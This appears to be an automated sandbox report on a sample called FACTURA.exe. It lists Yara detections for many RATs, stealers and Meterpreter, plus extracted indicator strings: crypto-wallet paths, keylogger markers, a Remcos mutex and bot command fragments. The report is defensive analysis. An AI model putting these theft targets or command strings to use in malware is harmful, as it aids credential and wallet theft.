Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Generic Dropper
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: wallet.datelectrum.dat
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: exodus.exe
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: 1Minimal configuration file for Ethereum mining is
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Yara detected Credential Stealer
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Metasploit Payload
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected NetWire RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected Imminent RAT
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected HawkEye Rat
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger]
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Detected Remcos RAT
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Yara detected Codoso Ghost
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568 Sample: FACTURA.exe Startdate: 08/10/2021 Architecture: WINDOWS Score: 100 46 spclient.wg.spotify.com 2->46 48 prda.aadg.msidentity.com 2->48 50 edge-web.dual-gslb.spotify.com 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 122 other signatures 2->58 7 mpam-fad3e9a8.exe 351 2->7         started        11 mpam-5e107659.exe 7 2->11         started        13 FACTURA.exe 1 2->13         started        15 3 other processes 2->15 signatures3 process4 file5 32 C:\Windows\...\mpuxagent.dll.mui, PE32 7->32 dropped 34 C:\Windows\...\ProtectionManagement.dll.mui, PE32 7->34 dropped 36 C:\Windows\...\MpEvMsg.dll.mui, PE32 7->36 dropped 44 193 other files (none is malicious) 7->44 dropped 60 Sample is not signed and drops a device driver 7->60 38 C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+ 11->38 dropped 40 C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+ 11->40 dropped 42 C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+ 11->42 dropped 17 MpSigStub.exe 4 11->17         started        20 WerFault.exe 19 16 13->20         started        22 WerFault.exe 2 16 13->22         started        24 conhost.exe 15->24         started        26 conhost.exe 15->26         started        signatures6 process7 file8 28 C:\Windows\ServiceProfiles\...\mpavbase.vdm, PE32+ 17->28 dropped 30 C:\Windows\ServiceProfiles\...\mpasbase.vdm, PE32+ 17->30 dropped
No contacted IP infos

Contacted Domains

Name IP Active
edge-web.dual-gslb.spotify.com 35.186.224.25 true
spclient.wg.spotify.com unknown unknown